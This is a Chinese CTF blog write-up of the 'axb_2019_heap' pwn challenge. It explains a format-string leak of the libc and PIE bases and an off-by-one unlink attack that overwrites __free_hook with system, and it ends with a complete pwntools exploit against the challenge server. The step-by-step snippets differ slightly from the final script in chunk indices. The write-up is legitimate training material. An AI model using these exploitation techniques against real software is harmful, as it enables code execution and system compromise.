axb_2019_heap【write up】

于 2023-04-08 17:51:38 发布
阅读量64 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/130032211
版权

axb_2019_heap

unlink和格式化字符串漏洞

惯例我们先来checksec一下

保护全开的64位程序

请添加图片描述

放进ida64里

看一下main函数非常标准的菜单堆题

请添加图片描述

有趣的是在一开始的banner函数中存在格式化字符串漏洞

通过观察栈上数据我们可以利用该函数泄露出main函数地址(即绕过PIE保护)并泄露libc

请添加图片描述

add_note函数

请添加图片描述

更正图片中的错误size和chunk addr并不会重合

delete_note函数

非常标准的释放流程 不存在uaf漏洞

请添加图片描述

edit_note函数

内部有个自定义函数get_input

请添加图片描述

get_input函数(漏洞点)

请添加图片描述

审题完成 开始解题

首先我们通过格式化字符串漏洞来计算偏移 得到偏移为7

请添加图片描述

然后我们利用gdb调试可以发现main函数的地址在偏移为19的地方 __libc_start_main+243在偏移为15的地方

于是我们可以通过泄露这两个地址来获得libc的地址并绕过PIE保护

请添加图片描述

io.recvuntil('name: ')
payload=b"%15$p%19$p"
io.sendline(payload)
io.recvuntil('0x')
libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main'] - 240
io.recvuntil('0x')
base=int(io.recv(12),16)-0x116A

然后我我们就可以通过计算得到note数组的地址和system函数的地址

接下来就是堆上的unlink操作了

由于我们观察edit函数发现存在off by one漏洞因此我们考虑使用unlink来达成我们的攻击目标

首先我们先来创建chunk

add(0,0x98,b'aaaa')
add(0,0x98,b'bbbb')
add(0,0x98,b'cccc')
add(0,0x98,b'/bin/sh')

然后我们通过edit函数来修改chunk0中的内容创建一个fd和bk指针指向note数组的fakechunk 并利用off by one漏洞 将chunk1中的size改为0xa0

将chunk1中的size修改为0xa0就会导致chunk1在free的时候认为前面已经是freechunk 进而触发堆合并unlink

payload=p64(0)+p64(0x91)+p64(bss-0x18)+p64(bss-0x10)+p64(0)*14+p64(0x90)+b'\xa0'
edit(0,payload)

然后我们将chunk1 free掉这样我们的chunk0实际上就已经跳转到了note数组上即此时我们note数组上原本存放chunk0地址的位置被篡改成了note的地址 这时我们编辑chunk0上的内容实际上就是在编辑note数组上的内容 我们将存放chunk0地址上的内容篡改为free_hook的地址

delete(1)
edit(0,p64(0)*3+p64(free_hook)+p64(0x10))

接下来我们修改chunk0上的内容实际上就是在修改free_hook上的内容 这样我们执行free函数实际上就是在执行system函数 接下来我们delete(3) 即可执行system(”/bin/sh“)

edit(0,p64(system))

然后只要io.interactive()就可以获取控制权啦
在这里插入图片描述

exp:

from pwn import *
#from LibcSearcher import *
context.log_level='debug'
#io=process('')
io=remote('node4.buuoj.cn',26148)
elf=ELF('./axb_2019_heap')
libc=ELF('./libc-2.23.so')
io.recvuntil('name: ')
payload=b"%15$p%19$p"
io.sendline(payload)
io.recvuntil('0x')
libc_base=int(io.recv(12),16)-libc.sym['__libc_start_main'] - 240
io.recvuntil('0x')
base=int(io.recv(12),16)-0x116A
system=libc.sym['system']+libc_base

free_hook=libc_base+libc.sym['__free_hook']

bss=base+0x202060
print(hex(base))
print(hex(libc_base))

#fmstr attack finish

def add(idx,size,content):
	io.sendlineafter(">> ",b"1")
	io.sendlineafter("(0-10):",str(idx))
	io.sendlineafter("size:",str(size))
	io.sendlineafter("content:",content)
	
def delete(idx):
	io.sendlineafter(">> ",b"2")
	io.sendlineafter("index:",str(idx))
	
def edit(idx,content):
	io.sendlineafter(">> ",b"4")
	io.sendlineafter("index:",str(idx))
	io.sendlineafter("content: \n",content)
	
add(0,0x98,b'aaaa')
add(1,0x98,b'bbbb')
add(2,0x90,b'cccc')
add(3,0x90,b'/bin/sh')

payload=p64(0)+p64(0x91)+p64(bss-0x18)+p64(bss-0x10)+p64(0)*14+p64(0x90)+b'\xa0'
edit(0,payload)
delete(1)
edit(0,p64(0)*3+p64(free_hook)+p64(0x10))
edit(0,p64(system))
delete(3)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 604
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
pwn入门小技巧
qq_36918532的博客
05-24 2673
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1043
buuctf pwn
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 412
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
福建省平和南靖等五校2018_2019学年高二生物上学期第一次联考试题.doc
11-30
丁图表示果蝇的性别决定,配子基因型可能为AXBaXB、AY、aY。 12. **种群数量动态**:图12展示了肺炎双球菌在液体培养基中的种群数量变化,可能涉及到种群增长模型,如逻辑斯谛增长模型或指数增长模型,其中S形...
Asm.rar_SUM
09-21
从提供的文件名"A+B.ASM"、"AxB+C.ASM"和"AxB.ASM"来看,我们可以推测这些程序分别实现了两个数相加、两个数相乘以及可能的乘加运算。 在计算机科学中,汇编语言是一种低级编程语言,它与机器语言密切相关,但比...
poj.rar_MáS
09-21
pku 3613 Cow Relays 题意:给一个无向图,求从起点s到终点e尽力n条边的路径最小值。 ...m表示节点个数,(aXb)表示a行b列的矩阵一个 ,那么(1Xm)* path[ l ](mXm) 。 最终复杂度为O(t^3logn)
讨论课5答案_9020055601
08-03
10. **矩阵方程的解**:矩阵方程`AXB = C`的解`X`要求`B`的列向量可以用`A`的列向量线性表示。如果`A`和`B`的列向量线性相关,那么`X`可能存在。 通过这些知识点的学习,我们可以深入理解线性代数的核心概念,这...
aaa2axb:aaa2axb
03-18
【aaa2axb: Python编程框架解析】 在Python编程领域,"aaa2axb"似乎是一个自定义的项目或框架的名称。虽然提供的信息有限,我们可以根据Python的常见实践来推测可能涉及的知识点。 首先,"aaa2axb"可能是项目名,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
torchaudio-0.12.1+cpu-cp37-cp37m-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
中南大学机械设计课程设计说明书.doc
07-17
说明书
仓库进销出入库存管理系统(带库存预警)-Excel模版
07-17
【作品名称】:仓库进销出入库存管理系统(带库存预警)-Excel模版 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
集成产品开发(IPD)高层培训.docx
07-17
集成产品开发(IPD)高层培训.docx
出入库存管理(进销存)-Excel模板
07-17
【作品名称】:出入库存管理(进销存)-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
E:\Qt6book_Axb_6.0\sampl3_1\widget.cpp:6: error: allocation of incomplete type 'Ui::Widget'
06-04
这个错误提示是因为在Widget.cpp文件中,你尝试对一个不完整的类型Ui::Widget进行分配内存的操作。这通常是因为你在Widget.cpp中使用了Ui::Widget类的成员变量或成员函数,但是没有包含相应的头文件。 解决这个问题的方法是在Widget.cpp文件中包含相应的头文件,如: ```cpp #include "widget.h" #include "ui_widget.h" ``` 其中,"widget.h"是你的Widget类的头文件,"ui_widget.h"是由Qt Designer生成的包含Ui::Widget类定义的头文件。这样就可以在Widget.cpp中使用Ui::Widget类的成员变量和成员函数了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值